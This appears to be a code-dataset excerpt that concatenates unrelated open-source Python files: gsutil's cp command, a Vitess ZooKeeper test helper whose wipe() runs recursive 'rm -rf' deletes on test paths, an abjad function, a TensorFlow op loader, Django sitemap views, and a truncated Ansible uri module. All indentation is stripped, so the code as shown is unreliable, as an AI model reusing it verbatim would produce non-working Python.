if dst_url.IsCloudUrl() and dst_url.HasGeneration():
raise CommandException('%s: a version-specific URL\n(%s)\ncannot be '
'the destination for gsutil cp - abort.'
% (cmd_name, dst_url))
if not dst_url.IsCloudUrl() and copy_helper_opts.dest_storage_class:
raise CommandException('Cannot specify storage class for a non-cloud '
'destination: %s' % dst_url)
src_obj_metadata = None
if name_expansion_result.expanded_result:
src_obj_metadata = encoding.JsonToMessage(
apitools_messages.Object, name_expansion_result.expanded_result)
if src_url.IsFileUrl() and preserve_posix:
if not src_obj_metadata:
src_obj_metadata = apitools_messages.Object()
mode, _, _, _, uid, gid, _, atime, mtime, _ = os.stat(
exp_src_url.object_name)
mode = ConvertModeToBase8(mode)
posix_attrs = POSIXAttributes(atime=atime, mtime=mtime, uid=uid, gid=gid,
mode=mode)
custom_metadata = apitools_messages.Object.MetadataValue(
additionalProperties=[])
SerializeFileAttributesToObjectMetadata(posix_attrs, custom_metadata,
preserve_posix=preserve_posix)
src_obj_metadata.metadata = custom_metadata
if src_obj_metadata and dst_url.IsFileUrl():
posix_attrs = DeserializeFileAttributesFromObjectMetadata(
src_obj_metadata, src_url.url_string)
mode = posix_attrs.mode.permissions
valid, err = ValidateFilePermissionAccess(src_url.url_string,
uid=posix_attrs.uid,
gid=posix_attrs.gid,
mode=mode)
if preserve_posix and not valid:
logging.getLogger().critical(err)
raise CommandException('This sync will orphan file(s), please fix their'
' permissions before trying again.')
bytes_transferred = 0
try:
if copy_helper_opts.use_manifest:
self.manifest.Initialize(
exp_src_url.url_string, dst_url.url_string)
(_, bytes_transferred, result_url, md5) = (
copy_helper.PerformCopy(
self.logger, exp_src_url, dst_url, gsutil_api,
self, _CopyExceptionHandler, src_obj_metadata=src_obj_metadata,
allow_splitting=True, headers=self.headers,
manifest=self.manifest, gzip_exts=self.gzip_exts,
preserve_posix=preserve_posix))
if copy_helper_opts.use_manifest:
if md5:
self.manifest.Set(exp_src_url.url_string, 'md5', md5)
self.manifest.SetResult(
exp_src_url.url_string, bytes_transferred, 'OK')
if copy_helper_opts.print_ver:
# Some cases don't return a version-specific URL (e.g., if destination
# is a file).
self.logger.info('Created: %s', result_url)
except ItemExistsError:
message = 'Skipping existing item: %s' % dst_url
self.logger.info(message)
if copy_helper_opts.use_manifest:
self.manifest.SetResult(exp_src_url.url_string, 0, 'skip', message)
except SkipUnsupportedObjectError, e:
message = ('Skipping item %s with unsupported object type %s' %
(exp_src_url.url_string, e.unsupported_type))
self.logger.info(message)
if copy_helper_opts.use_manifest:
self.manifest.SetResult(exp_src_url.url_string, 0, 'skip', message)
except copy_helper.FileConcurrencySkipError, e:
self.logger.warn('Skipping copy of source URL %s because destination URL '
'%s is already being copied by another gsutil process '
'or thread (did you specify the same source URL twice?) '
% (src_url, dst_url))
except Exception, e: # pylint: disable=broad-except
if (copy_helper_opts.no_clobber and
copy_helper.IsNoClobberServerException(e)):
message = 'Rejected (noclobber): %s' % dst_url
self.logger.info(message)
if copy_helper_opts.use_manifest:
self.manifest.SetResult(
exp_src_url.url_string, 0, 'skip', message)
elif self.continue_on_error:
message = 'Error copying %s: %s' % (src_url, str(e))
self.op_failure_count += 1
self.logger.error(message)
if copy_helper_opts.use_manifest:
self.manifest.SetResult(
exp_src_url.url_string, 0, 'error',
RemoveCRLFFromString(message))
else:
if copy_helper_opts.use_manifest:
self.manifest.SetResult(
exp_src_url.url_string, 0, 'error', str(e))
raise
else:
if copy_helper_opts.perform_mv:
self.logger.info('Removing %s...', exp_src_url)
if exp_src_url.IsCloudUrl():
gsutil_api.DeleteObject(exp_src_url.bucket_name,
exp_src_url.object_name,
generation=exp_src_url.generation,
provider=exp_src_url.scheme)
else:
os.unlink(exp_src_url.object_name)
with self.stats_lock:
# TODO: Remove stats_lock; we should be able to calculate bytes
# transferred from StatusMessages posted by operations within PerformCopy.
self.total_bytes_transferred += bytes_transferred
# Command entry point.
def RunCommand(self):
copy_helper_opts = self._ParseOpts()
self.total_bytes_transferred = 0
if self.args[-1] == '-' or self.args[-1] == 'file://-':
if self.preserve_posix_attrs:
raise CommandException('Cannot preserve POSIX attributes with a '
'stream.')
return CatHelper(self).CatUrlStrings(self.args[:-1])
if copy_helper_opts.read_args_from_stdin:
if len(self.args) != 1:
raise CommandException('Source URLs cannot be specified with -I option')
url_strs = StdinIterator()
else:
if len(self.args) < 2:
raise CommandException('Wrong number of arguments for "cp" command.')
url_strs = self.args[:-1]
(self.exp_dst_url, self.have_existing_dst_container) = (
copy_helper.ExpandUrlToSingleBlr(self.args[-1], self.gsutil_api,
self.debug, self.project_id))
name_expansion_iterator = NameExpansionIterator(
self.command_name, self.debug,
self.logger, self.gsutil_api, url_strs,
self.recursion_requested or copy_helper_opts.perform_mv,
project_id=self.project_id, all_versions=self.all_versions,
continue_on_error=self.continue_on_error or self.parallel_operations,
bucket_listing_fields=GetSourceFieldsNeededForCopy(
self.exp_dst_url.IsCloudUrl(),
copy_helper_opts.skip_unsupported_objects,
copy_helper_opts.preserve_acl,
preserve_posix=self.preserve_posix_attrs,
delete_source=copy_helper_opts.perform_mv))
# Because cp may have multiple source URLs, we wrap the name expansion
# iterator in order to collect analytics.
name_expansion_iterator = SourceUrlTypeIterator(
name_expansion_iterator=name_expansion_iterator,
is_daisy_chain=copy_helper_opts.daisy_chain,
dst_url=self.exp_dst_url)
seek_ahead_iterator = None
# Cannot seek ahead with stdin args, since we can only iterate them
# once without buffering in memory.
if not copy_helper_opts.read_args_from_stdin:
seek_ahead_iterator = SeekAheadNameExpansionIterator(
self.command_name, self.debug, self.GetSeekAheadGsutilApi(),
url_strs, self.recursion_requested or copy_helper_opts.perform_mv,
all_versions=self.all_versions, project_id=self.project_id)
# Use a lock to ensure accurate statistics in the face of
# multi-threading/multi-processing.
self.stats_lock = CreateLock()
# Tracks if any copies failed.
self.op_failure_count = 0
# Start the clock.
start_time = time.time()
# Tuple of attributes to share/manage across multiple processes in
# parallel (-m) mode.
shared_attrs = ('op_failure_count', 'total_bytes_transferred')
# Perform copy requests in parallel (-m) mode, if requested, using
# configured number of parallel processes and threads. Otherwise,
# perform requests with sequential function calls in current process.
self.Apply(_CopyFuncWrapper, name_expansion_iterator,
_CopyExceptionHandler, shared_attrs,
fail_on_error=(not self.continue_on_error),
seek_ahead_iterator=seek_ahead_iterator)
self.logger.debug(
'total_bytes_transferred: %d', self.total_bytes_transferred)
end_time = time.time()
self.total_elapsed_time = end_time - start_time
self.total_bytes_per_second = CalculateThroughput(
self.total_bytes_transferred, self.total_elapsed_time)
LogPerformanceSummaryParams(
has_file_dst=self.exp_dst_url.IsFileUrl(),
has_cloud_dst=self.exp_dst_url.IsCloudUrl(),
avg_throughput=self.total_bytes_per_second,
total_bytes_transferred=self.total_bytes_transferred,
total_elapsed_time=self.total_elapsed_time,
uses_fan=self.parallel_operations,
is_daisy_chain=copy_helper_opts.daisy_chain,
provider_types=[self.exp_dst_url.scheme])
if self.debug >= DEBUGLEVEL_DUMP_REQUESTS:
# Note that this only counts the actual GET and PUT bytes for the copy
# - not any transfers for doing wildcard expansion, the initial
# HEAD/GET request performed to get the object metadata, etc.
if self.total_bytes_transferred != 0:
self.logger.info(
'Total bytes copied=%d, total elapsed time=%5.3f secs (%sps)',
self.total_bytes_transferred, self.total_elapsed_time,
MakeHumanReadable(self.total_bytes_per_second))
if self.op_failure_count:
plural_str = 's' if self.op_failure_count > 1 else ''
raise CommandException('%d file%s/object%s could not be transferred.' % (
self.op_failure_count, plural_str, plural_str))
return 0
def _ParseOpts(self):
# TODO: Arrange variables initialized here in alphabetical order.
perform_mv = False
# exclude_symlinks is handled by Command parent class, so save in Command
# state rather than CopyHelperOpts.
self.exclude_symlinks = False
no_clobber = False
# continue_on_error is handled by Command parent class, so save in Command
# state rather than CopyHelperOpts.
self.continue_on_error = False
daisy_chain = False
read_args_from_stdin = False
print_ver = False
use_manifest = False
preserve_acl = False
self.preserve_posix_attrs = False
canned_acl = None
# canned_acl is handled by a helper function in parent
# Command class, so save in Command state rather than CopyHelperOpts.
self.canned = None
self.all_versions = False
self.skip_unsupported_objects = False
# Files matching these extensions should be gzipped before uploading.
gzip_arg_exts = None
gzip_arg_all = None
test_callback_file = None
dest_storage_class = None
# self.recursion_requested initialized in command.py (so can be checked
# in parent class for all commands).
self.manifest = None
if self.sub_opts:
for o, a in self.sub_opts:
if o == '-a':
canned_acl = a
self.canned = True
if o == '-A':
self.all_versions = True
if o == '-c':
self.continue_on_error = True
elif o == '-D':
daisy_chain = True
elif o == '-e':
self.exclude_symlinks = True
elif o == '--testcallbackfile':
# File path of a pickled class that implements ProgressCallback.call.
# Used for testing transfer interruptions and resumes.
test_callback_file = a
elif o == '-I':
read_args_from_stdin = True
elif o == '-L':
use_manifest = True
self.manifest = Manifest(a)
elif o == '-M':
# Note that we signal to the cp command to perform a move (copy
# followed by remove) and use directory-move naming rules by passing
# the undocumented (for internal use) -M option when running the cp
# command from mv.py.
perform_mv = True
elif o == '-n':
no_clobber = True
elif o == '-p':
preserve_acl = True
elif o == '-P':
self.preserve_posix_attrs = True
InitializeUserGroups()
elif o == '-r' or o == '-R':
self.recursion_requested = True
elif o == '-s':
dest_storage_class = NormalizeStorageClass(a)
elif o == '-U':
self.skip_unsupported_objects = True
elif o == '-v':
print_ver = True
elif o == '-z':
gzip_arg_exts = [x.strip() for x in a.split(',')]
elif o == '-Z':
gzip_arg_all = GZIP_ALL_FILES
if preserve_acl and canned_acl:
raise CommandException(
'Specifying both the -p and -a options together is invalid.')
if self.all_versions and self.parallel_operations:
raise CommandException(
'The gsutil -m option is not supported with the cp -A flag, to '
'ensure that object version ordering is preserved. Please re-run '
'the command without the -m option.')
if gzip_arg_exts and gzip_arg_all:
raise CommandException(
'Specifying both the -z and -Z options together is invalid.')
self.gzip_exts = gzip_arg_exts or gzip_arg_all
return CreateCopyHelperOpts(
perform_mv=perform_mv,
no_clobber=no_clobber,
daisy_chain=daisy_chain,
read_args_from_stdin=read_args_from_stdin,
print_ver=print_ver,
use_manifest=use_manifest,
preserve_acl=preserve_acl,
canned_acl=canned_acl,
skip_unsupported_objects=self.skip_unsupported_objects,
test_callback_file=test_callback_file,
dest_storage_class=dest_storage_class)
| apache-2.0 |
netroby/vitess | test/topo_flavor/zookeeper.py | 2 | 2788 | #!/usr/bin/env python
# Copyright 2014, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
import logging
import os
import json
import server
class ZkTopoServer(server.TopoServer):
"""Implementation of TopoServer for ZooKeeper"""
def __init__(self):
self.ports_assigned = False
def assign_ports(self):
"""Assign ports if not already assigned"""
if self.ports_assigned:
return
from environment import reserve_ports
import utils
self.zk_port_base = reserve_ports(3)
self.hostname = utils.hostname
self.zk_ports = ':'.join(str(self.zk_port_base + i) for i in range(3))
self.zk_client_port = self.zk_port_base + 2
self.ports_assigned = True
def setup(self, add_bad_host=False):
from environment import run, binary_args, vtlogroot, tmproot
self.assign_ports()
run(binary_args('zkctl') + [
'-log_dir', vtlogroot,
'-zk.cfg', '1@%s:%s' % (self.hostname, self.zk_ports),
'init'])
config = tmproot + '/test-zk-client-conf.json'
with open(config, 'w') as f:
ca_server = 'localhost:%u' % (self.zk_client_port)
if add_bad_host:
ca_server += ',does.not.exists:1234'
zk_cell_mapping = {
'test_nj': 'localhost:%u' % (self.zk_client_port),
'test_ny': 'localhost:%u' % (self.zk_client_port),
'test_ca': ca_server,
'global': 'localhost:%u' % (self.zk_client_port),
}
json.dump(zk_cell_mapping, f)
os.environ['ZK_CLIENT_CONFIG'] = config
logging.debug('Using ZK_CLIENT_CONFIG=%s', str(config))
run(binary_args('zk') + ['touch', '-p', '/zk/test_nj/vt'])
run(binary_args('zk') + ['touch', '-p', '/zk/test_ny/vt'])
run(binary_args('zk') + ['touch', '-p', '/zk/test_ca/vt'])
def teardown(self):
from environment import run, binary_args, vtlogroot
import utils
self.assign_ports()
run(binary_args('zkctl') + [
'-log_dir', vtlogroot,
'-zk.cfg', '1@%s:%s' % (self.hostname, self.zk_ports),
'shutdown' if utils.options.keep_logs else 'teardown'],
raise_on_error=False)
def flags(self):
return ['-topo_implementation', 'zookeeper']
def wipe(self):
from environment import run, binary_args
# Work around safety check on recursive delete.
run(binary_args('zk') + ['rm', '-rf', '/zk/test_nj/vt/*'])
run(binary_args('zk') + ['rm', '-rf', '/zk/test_ny/vt/*'])
run(binary_args('zk') + ['rm', '-rf', '/zk/global/vt/*'])
run(binary_args('zk') + ['rm', '-f', '/zk/test_nj/vt'])
run(binary_args('zk') + ['rm', '-f', '/zk/test_ny/vt'])
run(binary_args('zk') + ['rm', '-f', '/zk/global/vt'])
server.flavor_map['zookeeper'] = ZkTopoServer()
| bsd-3-clause |
mscuthbert/abjad | abjad/tools/scoretools/set_measure_denominator_and_adjust_numerator.py | 2 | 1791 | # -*- encoding: utf-8 -*-
from abjad.tools import indicatortools
from abjad.tools import durationtools
from abjad.tools import mathtools
from abjad.tools.topleveltools import attach
from abjad.tools.topleveltools import detach
# TODO: implement scoretools.set_measure_denominator_and_adjust_contents().
def set_measure_denominator_and_adjust_numerator(measure, denominator):
r'''Set `measure` time signature `denominator` and multiply time signature numerator accordingly:
::
>>> measure = Measure((3, 8), "c'8 d'8 e'8")
>>> beam = spannertools.Beam()
>>> attach(beam, measure.select_leaves())
.. doctest::
>>> print(format(measure))
{
\time 3/8
c'8 [
d'8
e'8 ]
}
::
>>> scoretools.set_measure_denominator_and_adjust_numerator(measure, 16)
Measure((6, 16), "c'8 d'8 e'8")
.. doctest::
>>> print(format(measure))
{
\time 6/16
c'8 [
d'8
e'8 ]
}
Leave `measure` contents unchanged.
Return `measure`.
'''
from abjad.tools import scoretools
if isinstance(measure, scoretools.Measure):
# to allow iteration inside zero-update loop
old_time_signature = measure.time_signature
old_time_signature_pair = (
old_time_signature.numerator, old_time_signature.denominator)
new_time_signature = mathtools.NonreducedFraction(old_time_signature_pair)
new_time_signature = new_time_signature.with_denominator(denominator)
new_time_signature = indicatortools.TimeSignature(new_time_signature)
detach(indicatortools.TimeSignature, measure)
attach(new_time_signature, measure)
return measure
| gpl-3.0 |
cg31/tensorflow | tensorflow/contrib/tensor_forest/python/ops/inference_ops.py | 15 | 2143 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for BrainTree v2 tree evaluation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import load_library
from tensorflow.python.framework import ops
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import tf_logging as logging
INFERENCE_OPS_FILE = '_inference_ops.so'
_inference_ops = None
_ops_lock = threading.Lock()
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable('TreePredictions')
ops.RegisterShape('TreePredictions')(common_shapes.call_cpp_shape_fn)
# Workaround for the fact that importing tensorflow imports contrib
# (even if a user isn't using this or any other contrib op), but
# there's not yet any guarantee that the shared object exists.
# In which case, "import tensorflow" will always crash, even for users that
# never use contrib.
def Load():
"""Load the inference ops library and return the loaded module."""
with _ops_lock:
global _inference_ops
if not _inference_ops:
ops_path = resource_loader.get_path_to_datafile(INFERENCE_OPS_FILE)
logging.info('data path: %s', ops_path)
_inference_ops = load_library.load_op_library(ops_path)
assert _inference_ops, 'Could not load inference_ops.so'
return _inference_ops
| apache-2.0 |
CubicERP/geraldo | site/newsite/site-geraldo/django/contrib/sitemaps/views.py | 55 | 1891 | from django.http import HttpResponse, Http404
from django.template import loader
from django.contrib.sites.models import Site
from django.core import urlresolvers
from django.utils.encoding import smart_str
from django.core.paginator import EmptyPage, PageNotAnInteger
def index(request, sitemaps):
current_site = Site.objects.get_current()
sites = []
protocol = request.is_secure() and 'https' or 'http'
for section, site in sitemaps.items():
if callable(site):
pages = site().paginator.num_pages
else:
pages = site.paginator.num_pages
sitemap_url = urlresolvers.reverse('django.contrib.sitemaps.views.sitemap', kwargs={'section': section})
sites.append('%s://%s%s' % (protocol, current_site.domain, sitemap_url))
if pages > 1:
for page in range(2, pages+1):
sites.append('%s://%s%s?p=%s' % (protocol, current_site.domain, sitemap_url, page))
xml = loader.render_to_string('sitemap_index.xml', {'sitemaps': sites})
return HttpResponse(xml, mimetype='application/xml')
def sitemap(request, sitemaps, section=None):
maps, urls = [], []
if section is not None:
if section not in sitemaps:
raise Http404("No sitemap available for section: %r" % section)
maps.append(sitemaps[section])
else:
maps = sitemaps.values()
page = request.GET.get("p", 1)
for site in maps:
try:
if callable(site):
urls.extend(site().get_urls(page))
else:
urls.extend(site.get_urls(page))
except EmptyPage:
raise Http404("Page %s empty" % page)
except PageNotAnInteger:
raise Http404("No page '%s'" % page)
xml = smart_str(loader.render_to_string('sitemap.xml', {'urlset': urls}))
return HttpResponse(xml, mimetype='application/xml')
| lgpl-3.0 |
Tiger66639/ansible-modules-core | network/basics/uri.py | 14 | 19263 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Romeo Theriault <romeot () hawaii.edu>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# see examples/playbooks/uri.yml
import cgi
import shutil
import tempfile
import base64
import datetime
try:
import json
except ImportError:
import simplejson as json
DOCUMENTATION = '''
---
module: uri
short_description: Interacts with webservices
description:
- Interacts with HTTP and HTTPS web services and supports Digest, Basic and WSSE
HTTP authentication mechanisms.
version_added: "1.1"
options:
url:
description:
- HTTP or HTTPS URL in the form (http|https)://host.domain[:port]/path
required: true
default: null
aliases: []
dest:
description:
- path of where to download the file to (if desired). If I(dest) is a directory, the basename of the file on the remote server will be used.
required: false
default: null
user:
description:
- username for the module to use for Digest, Basic or WSSE authentication.
required: false
default: null
password:
description:
- password for the module to use for Digest, Basic or WSSE authentication.
required: false
default: null
body:
description:
- The body of the http request/response to the web service.
required: false
default: null
body_format:
description:
- The serialization format of the body. When set to json, encodes the body argument and automatically sets the Content-Type header accordingly.
required: false
choices: [ "raw", "json" ]
default: raw
method:
description:
- The HTTP method of the request or response.
required: false
choices: [ "GET", "POST", "PUT", "HEAD", "DELETE", "OPTIONS", "PATCH", "TRACE", "CONNECT", "REFRESH" ]
default: "GET"
return_content:
description:
- Whether or not to return the body of the request as a "content" key in the dictionary result. If the reported Content-type is "application/json", then the JSON is additionally loaded into a key called C(json) in the dictionary results.
required: false
choices: [ "yes", "no" ]
default: "no"
force_basic_auth:
description:
- httplib2, the library used by the uri module only sends authentication information when a webservice
responds to an initial request with a 401 status. Since some basic auth services do not properly
send a 401, logins will fail. This option forces the sending of the Basic authentication header
upon initial request.
required: false
choices: [ "yes", "no" ]
default: "no"
follow_redirects:
description:
- Whether or not the URI module should follow redirects. C(all) will follow all redirects.
C(safe) will follow only "safe" redirects, where "safe" means that the client is only
doing a GET or HEAD on the URI to which it is being redirected. C(none) will not follow
any redirects. Note that C(yes) and C(no) choices are accepted for backwards compatibility,
where C(yes) is the equivalent of C(all) and C(no) is the equivalent of C(safe). C(yes) and C(no)
are deprecated and will be removed in some future version of Ansible.
required: false
choices: [ "all", "safe", "none" ]
default: "safe"
creates:
description:
- a filename, when it already exists, this step will not be run.
required: false
removes:
description:
- a filename, when it does not exist, this step will not be run.
required: false
status_code:
description:
- A valid, numeric, HTTP status code that signifies success of the request. Can also be comma separated list of status codes.
required: false
default: 200
timeout:
description:
- The socket level timeout in seconds
required: false
default: 30
HEADER_:
description:
- Any parameter starting with "HEADER_" is a sent with your request as a header.
For example, HEADER_Content-Type="application/json" would send the header
"Content-Type" along with your request with a value of "application/json".
required: false
default: null
others:
description:
- all arguments accepted by the M(file) module also work here
required: false
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only
set to C(no) used on personally controlled sites using self-signed
certificates. Prior to 1.9.2 the code defaulted to C(no).
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: '1.9.2'
# informational: requirements for nodes
requirements: [ urlparse, httplib2 ]
author: "Romeo Theriault (@romeotheriault)"
'''
EXAMPLES = '''
# Check that you can connect (GET) to a page and it returns a status 200
- uri: url=http://www.example.com
# Check that a page returns a status 200 and fail if the word AWESOME is not in the page contents.
- action: uri url=http://www.example.com return_content=yes
register: webpage
- action: fail
when: "'illustrative' not in webpage.content"
# Create a JIRA issue
- uri:
url: https://your.jira.example.com/rest/api/2/issue/
method: POST
user: your_username
password: your_pass
body: "{{ lookup('file','issue.json') }}"
force_basic_auth: yes
status_code: 201
body_format: json
# Login to a form based webpage, then use the returned cookie to
# access the app in later tasks
- uri:
url: https://your.form.based.auth.examle.com/index.php
method: POST
body: "name=your_username&password=your_password&enter=Sign%20in"
status_code: 302
HEADER_Content-Type: "application/x-www-form-urlencoded"
register: login
- uri:
url: https://your.form.based.auth.example.com/dashboard.php
method: GET
return_content: yes
HEADER_Cookie: "{{login.set_cookie}}"
# Queue build of a project in Jenkins:
- uri:
url: "http://{{ jenkins.host }}/job/{{ jenkins.job }}/build?token={{ jenkins.token }}"
method: GET
user: "{{ jenkins.user }}"
password: "{{ jenkins.password }}"
force_basic_auth: yes
status_code: 201
'''
HAS_HTTPLIB2 = True
try:
import httplib2
except ImportError:
HAS_HTTPLIB2 = False
HAS_URLPARSE = True
try:
import urlparse
import socket
except ImportError:
HAS_URLPARSE = False
def write_file(module, url, dest, content):
# create a tempfile with some test content
fd, tmpsrc = tempfile.mkstemp()
f = open(tmpsrc, 'wb')
try:
f.write(content)
except Exception, err:
os.remove(tmpsrc)
module.fail_json(msg="failed to create temporary content file: %s" % str(err))
f.close()
checksum_src = None
checksum_dest = None
# raise an error if there is no tmpsrc file
if not os.path.exists(tmpsrc):
os.remove(tmpsrc)
module.fail_json(msg="Source %s does not exist" % (tmpsrc))
if not os.access(tmpsrc, os.R_OK):
os.remove(tmpsrc)
module.fail_json( msg="Source %s not readable" % (tmpsrc))
checksum_src = module.sha1(tmpsrc)
# check if there is no dest file
if os.path.exists(dest):
# raise an error if copy has no permission on dest
if not os.access(dest, os.W_OK):
os.remove(tmpsrc)
module.fail_json( msg="Destination %s not writable" % (dest))
if not os.access(dest, os.R_OK):
os.remove(tmpsrc)
module.fail_json( msg="Destination %s not readable" % (dest))
checksum_dest = module.sha1(dest)
else:
if not os.access(os.path.dirname(dest), os.W_OK):
os.remove(tmpsrc)
module.fail_json( msg="Destination dir %s not writable" % (os.path.dirname(dest)))
if checksum_src != checksum_dest:
try:
shutil.copyfile(tmpsrc, dest)
except Exception, err:
os.remove(tmpsrc)
module.fail_json(msg="failed to copy %s to %s: %s" % (tmpsrc, dest, str(err)))
os.remove(tmpsrc)
def url_filename(url):
fn = os.path.basename(urlparse.urlsplit(url)[2])
if fn == '':
return 'index.html'
return fn
def uri(module, url, dest, user, password, body, body_format, method, headers, redirects, socket_timeout, validate_certs):
# To debug
#httplib2.debuglevel = 4
# Handle Redirects
if redirects == "all" or redirects == "yes":
follow_redirects = True
follow_all_redirects = True
elif redirects == "none":
follow_redirects = False
follow_all_redirects = False
else:
follow_redirects = True
follow_all_redirects = False
# Create a Http object and set some default options.
disable_validation = not validate_certs
h = httplib2.Http(disable_ssl_certificate_validation=disable_validation, timeout=socket_timeout)
h.follow_all_redirects = follow_all_redirects
h.follow_redirects = follow_redirects
h.forward_authorization_headers = True
# If they have a username or password verify they have both, then add them to the request
if user is not None and password is None:
module.fail_json(msg="Both a username and password need to be set.")
if password is not None and user is None:
module.fail_json(msg="Both a username and password need to be set.")
if user is not None and password is not None:
h.add_credentials(user, password)
# is dest is set and is a directory, let's check if we get redirected and
# set the filename from that url
redirected = False
resp_redir = {}
r = {}
if dest is not None:
dest = os.path.expanduser(dest)
if os.path.isdir(dest):
# first check if we are redirected to a file download
h.follow_redirects=False
# Try the request
try:
resp_redir, content_redir = h.request(url, method=method, body=body, headers=headers)
# if we are redirected, update the url with the location header,
# and update dest with the new url filename
except:
pass
if 'status' in resp_redir and resp_redir['status'] in ["301", "302", "303", "307"]:
url = resp_redir['location']
redirected = True
dest = os.path.join(dest, url_filename(url))
# if destination file already exist, only download if file newer
if os.path.exists(dest):
t = datetime.datetime.utcfromtimestamp(os.path.getmtime(dest))
tstamp = t.strftime('%a, %d %b %Y %H:%M:%S +0000')
headers['If-Modified-Since'] = tstamp
# do safe redirects now, including 307
h.follow_redirects=follow_redirects
# Make the request, or try to :)
try:
resp, content = h.request(url, method=method, body=body, headers=headers)
r['redirected'] = redirected
r.update(resp_redir)
r.update(resp)
return r, content, dest
except httplib2.RedirectMissingLocation:
module.fail_json(msg="A 3xx redirect response code was provided but no Location: header was provided to point to the new location.")
except httplib2.RedirectLimit:
module.fail_json(msg="The maximum number of redirections was reached without coming to a final URI.")
except httplib2.ServerNotFoundError:
module.fail_json(msg="Unable to resolve the host name given.")
except httplib2.RelativeURIError:
module.fail_json(msg="A relative, as opposed to an absolute URI, was passed in.")
except httplib2.FailedToDecompressContent:
module.fail_json(msg="The headers claimed that the content of the response was compressed but the decompression algorithm applied to the content failed.")
except httplib2.UnimplementedDigestAuthOptionError:
module.fail_json(msg="The server requested a type of Digest authentication that we are unfamiliar with.")
except httplib2.UnimplementedHmacDigestAuthOptionError:
module.fail_json(msg="The server requested a type of HMACDigest authentication that we are unfamiliar with.")
except httplib2.UnimplementedHmacDigestAuthOptionError:
module.fail_json(msg="The server requested a type of HMACDigest authentication that we are unfamiliar with.")
except httplib2.CertificateHostnameMismatch:
module.fail_json(msg="The server's certificate does not match with its hostname.")
except httplib2.SSLHandshakeError:
module.fail_json(msg="Unable to validate server's certificate against available CA certs.")
except socket.error, e:
module.fail_json(msg="Socket error: %s to %s" % (e, url))
def main():
module = AnsibleModule(
argument_spec = dict(
url = dict(required=True),
dest = dict(required=False, default=None),
user = dict(required=False, default=None),
password = dict(required=False, default=None),
body = dict(required=False, default=None),
body_format = dict(required=False, default='raw', choices=['raw', 'json']),
method = dict(required=False, default='GET', choices=['GET', 'POST', 'PUT', 'HEAD', 'DELETE', 'OPTIONS', 'PATCH', 'TRACE', 'CONNECT', 'REFRESH']),
return_content = dict(required=False, default='no', type='bool'),
force_basic_auth = dict(required=False, default='no', type='bool'),
follow_redirects = dict(required=False, default='safe', choices=['all', 'safe', 'none', 'yes', 'no']),
creates = dict(required=False, default=None),
removes = dict(required=False, default=None),
status_code = dict(required=False, default=[200], type='list'),
timeout = dict(required=False, default=30, type='int'),
validate_certs = dict(required=False, default=True, type='bool'),
),
check_invalid_arguments=False,
add_file_common_args=True
)
if not HAS_HTTPLIB2:
module.fail_json(msg="httplib2 is not installed")
if not HAS_URLPARSE:
module.fail_json(msg="urlparse is not installed")
url = module.params['url']
user = module.params['user']
password = module.params['password']
body = module.params['body']
body_format = module.params['body_format']
method = module.params['method']
dest = module.params['dest']
return_content = module.params['return_content']
force_basic_auth = module.params['force_basic_auth']
redirects = module.params['follow_redirects']
creates = module.params['creates']
removes = module.params['removes']
status_code = [int(x) for x in list(module.params['status_code'])]
socket_timeout = module.params['timeout']
validate_certs = module.params['validate_certs']
dict_headers = {}
# If body_format is json, encodes the body (wich can be a dict or a list) and automatically sets the Content-Type header
if body_format == 'json':
body = json.dumps(body)
dict_headers['Content-Type'] = 'application/json'
# Grab all the http headers. Need this hack since passing multi-values is currently a bit ugly. (e.g. headers='{"Content-Type":"application/json"}')
for key, value in module.params.iteritems():
if key.startswith("HEADER_"):
skey = key.replace("HEADER_", "")
dict_headers[skey] = value
if creates is not None:
# do not run the command if the line contains creates=filename
# and the filename already exists. This allows idempotence
# of uri executions.
creates = os.path.expanduser(creates)
if os.path.exists(creates):
module.exit_json(stdout="skipped, since %s exists" % creates, changed=False, stderr=False, rc=0)
if removes is not None:
# do not run the command if the line contains removes=filename
# and the filename do not exists. This allows idempotence
# of uri executions.
v = os.path.expanduser(removes)
if not os.path.exists(removes):
module.exit_json(stdout="skipped, since %s does not exist" % removes, changed=False, stderr=False, rc=0)
# httplib2 only sends authentication after the server asks for it with a 401.
# Some 'basic auth' servies fail to send a 401 and require the authentication
# up front. This creates the Basic authentication header and sends it immediately.
if force_basic_auth:
dict_headers["Authorization"] = "Basic {0}".format(base64.b64encode("{0}:{1}".format(user, password)))
# Make the request
resp, content, dest = uri(module, url, dest, user, password, body, body_format, method, dict_headers, redirects, socket_timeout, validate_certs)
resp['status'] = int(resp['status'])
# Write the file out if requested
if dest is not None:
if resp['status'] == 304:
changed = False
else:
write_file(module, url, dest, content)
# allow file attribute changes
changed = True
module.params['path'] = dest
file_args = module.load_file_common_arguments(module.params)
file_args['path'] = dest
changed = module.set_fs_attributes_if_different(file_args, changed)
resp['path'] = dest
else:
changed = False
# Transmogrify the headers, replacing '-' with '_', since variables dont work with dashes.
uresp = {}
for key, value in resp.iteritems():
ukey = key.replace("-", "_")
uresp[ukey] = value
# Default content_encoding to try
content_encoding = 'utf-8'
if 'content_type' in uresp:
content_type, params = cgi.parse_header(uresp['content_type'])
if 'charset' in params:
content_encoding = params['charset']
